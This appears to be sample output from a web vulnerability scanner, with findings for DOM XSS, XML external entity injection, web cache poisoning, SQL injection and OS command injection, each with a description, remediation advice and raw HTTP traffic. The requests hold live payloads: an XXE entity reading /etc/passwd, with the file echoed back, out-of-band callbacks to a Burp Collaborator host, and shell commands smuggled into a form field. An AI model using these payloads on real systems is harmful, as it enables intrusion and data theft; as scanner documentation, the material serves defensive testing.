steps_to_reproduce

vulnerable_code

start_line_number

end_line_number

affected_endpoints

package_name

affected_versions

installed_version

aws_account_id

azure_category

Cross-site scripting (DOM-based)

DOM-based vulnerabilities arise when a client-side script reads data from a controllable part of the DOM (for example, the URL) and processes this data in an unsafe way.
DOM-based cross-site scripting arises when a script writes controllable data into the HTML document in an unsafe way. An attacker may be able to use the vulnerability to construct a URL that, if visited by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to visit the attacker's crafted URL in various ways, similar to the usual attack delivery vectors for reflected cross-site scripting vulnerabilities.

The most effective way to avoid DOM-based cross-site scripting vulnerabilities is not to dynamically write data from any untrusted source into the HTML document. If the desired functionality of the application means that this behavior is unavoidable, then defenses must be implemented within the client-side code to prevent malicious data from introducing script code into the document. In many cases, the relevant data can be validated on a whitelist basis, to allow only content that is known to be safe. In other cases, it will be necessary to sanitize or encode the data. This can be a complex task, and depending on the context that the data is to be inserted may need to involve a combination of JavaScript escaping, HTML encoding, and URL encoding, in the appropriate sequence.

https://siteone.com/users/?user_id=5

GET /users/?user_id=5 HTTP/1.1
Host: siteone.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://siteone.com/
Connection: close
Cookie: session=4dcK7sqNQYBUau2QaGSPINQOewWDmQuf
Upgrade-Insecure-Requests: 1

XML enternal entity injection

The application is vulnerable to XML external entity injection. The tag <!DOCTYPE foo [<!ENTITY xxe0wi5o SYSTEM "file:///etc/passwd"> ]> was injected into the XML sent to the server. This tag defines an external entity, xxe0wi5o, which references a file on the XML parser's filesystem. This entity was then used within a data field in the XML document. The server's response contains the contents of the specified file, indicating that the parser processed the injected external entity. Additionally, the tag <!DOCTYPE foo [<!ENTITY xxemsjgo SYSTEM "http://3tx4q4uba42hneb6gki1x6lmmds6gx4rsij59ty.burpcollaborator.net"> ]> was injected into the XML sent to the server. This tag defines an external entity, xxemsjgo, which references a URL on an external domain. The application interacted with that domain, indicating that the parser processed the injected external entity

Parsers that are used to process XML from untrusted sources should be configured to disable processing of all external resources. This is usually possible, and will prevent a number of related attacks. You should consult the documentation for your XML parsing library to determine how to achieve this.
XML external entity injection makes use of the DOCTYPE tag to define the injected entity. It may also be possible to disable the DOCTYPE tag or use input validation to block input containing it.

https://sitetwo.com/product/stock

POST /product/stock HTTP/1.1
Host: sitetwo.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://sitetwo.com/product?productId=6
Content-Type: application/xml
Content-Length: 107
Connection: close
Cookie: session=V46liKu0jgBPI1N9v1MGeVBaRyx5GBAG

<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE foo [<!ENTITY xxe0wi5o SYSTEM "file:///etc/passwd"> ]><stockCheck><productId>6&xxe0wi5o;</productId><storeId>1</storeId></stockCheck>

HTTP/1.1 400 Bad Request
Date: Thu, 20 Jun 2019 09:13:48 GMT
Content-Type: application/json
Content-Length: 1145
Connection: close
Content-Security-Policy: default-src 'self'; script-src 'self'; img-src 'self'; style-src 'self'; frame-src 'self'; connect-src 'self' ws://localhost:3333; font-src 'self'; media-src 'self'; object-src 'none'; child-src 'self' blob:
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
X-Frame-Options: DENY

"Invalid product ID: 6root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
peter:x:2001:2001::/home/peter:/bin/bash
user:x:2000:2000::/home/user:/bin/bash
dnsmasq:x:101:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
messagebus:x:102:101::/nonexistent:/usr/sbin/nologin
"

Web Cache Poisoning

Web caches identify resources using a few specific components of each HTTP request, together known as the cache key. Two requests with the same cache key are regarded by the cache as equivalent.
Web cache poisoning vulnerabilities arise when an application behind a cache processes input that is not included in the cache key. Attackers can exploit this by sending crafted input to trigger a harmful response that the cache will then save and serve to other users.
The impact is potentially serious as the malicious cached page may be served to a large number of users without other interaction. The threat posed by this vulnerability depends largely on what can be achieved with the input. Often the input is vulnerable to XSS, or can be used to trigger a redirect to another domain. Other times, it can simply be used to swap pages around.

To resolve this issue, either disable support for the affected input, or disable caching on all affected pages.
If both the affected input and caching behavior are required, configure the cache to ensure that the input is included in the cache key. Depending on which caching solution you use, if the input is in a request header it might be possible to achieve this using the Vary response header.

https://sitethree.com/contact-us

GET /contact-us?input=foo&m0xp37ttir=1 HTTP/1.1
Host: sitethree.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://sitethree.com/cachepoison/
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-Host: 5256z63dj6bjwgk8pmr368uovf18pad3er4eu2j.burpcollaborator.net
X-Host: 5256z63dj6bjwgk8pmr368uovf18pad3er4eu2j.burpcollaborator.net
X-Forwarded-Server: 5256z63dj6bjwgk8pmr368uovf18pad3er4eu2j.burpcollaborator.net

HTTP/1.1 200 OK
Content-Type: text/html
Server: Apache/2.4.9 (Unix)
Status: 200 OK
Vary: Accept-Encoding
Date: Thu, 20 Jun 2019 12:45:33 GMT
Content-Length: 60
Connection: close

5256z63dj6bjwgk8pmr368uovf18pad3er4eu2j.burpcollaborator.net

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
A wide range of damaging attacks can often be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and taking control of the database server.

The most effective way to prevent SQL injection attacks is to use parameterized queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already been defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterized queries. It is strongly recommended that you parameterize every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

https://sitefour.com/events

GET /events HTTP/1.1
Host: sitefour.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://sitefour.com/product?productId=6
Connection: close
Cookie: TrackingId=38faBE1NUKTK4eYI'%7c%7c(select%20extractvalue(xmltype('%3c%3fxml%20version%3d%221.0%22%20encoding%3d%22UTF-8%22%3f%3e%3c!DOCTYPE%20root%20[%20%3c!ENTITY%20%25%20waqks%20SYSTEM%20%22http%3a%2f%2fpmfqjqnx3qv3g04s96bnqse8fzls9mxqlj89wy.burpcollab'%7c%7c'orator.net%2f%22%3e%25waqks%3b]%3e')%2c'%2fl')%20from%20dual)%7c%7c'; session=pQR94ZdLkjTnh6VvIovAfZi7yqrNrjwA
Upgrade-Insecure-Requests: 1

OS command injection

Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. It may also be possible to use the server as a platform for attacks against other systems. The exact potential for exploitation depends upon the security context in which the command is executed, and the privileges that this context has regarding sensitive resources on the server.

If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.

https://sitefive.com/feedback/submit

POST /feedback/submit HTTP/1.1
Host: insecure-website.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:67.0) Gecko/20100101 Firefox/67.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://insecure-website.com/feedback
Content-Type: application/x-www-form-urlencoded
Content-Length: 95
Connection: close
Cookie: session=5AZnp7FvA6cNx16MMzwa3i3LDOAY4pvZ

csrf=AgPcq8h37cv2FtglRj4PodzvuEYOCeEz&name=test&email=test%40test.com&subject=test%26nslookup%20-q%3dcname%20dr8eoesl8e0rlo9geugbvgjwknqge621qtdm1b.burpcollaborator.net.%26'%5c%22%600%26nslookup%20-q%3dcname%20dr8eoesl8e0rlo9geugbvgjwknqge621qtdm1b.burpcollaborator.net.%26%60'&message=test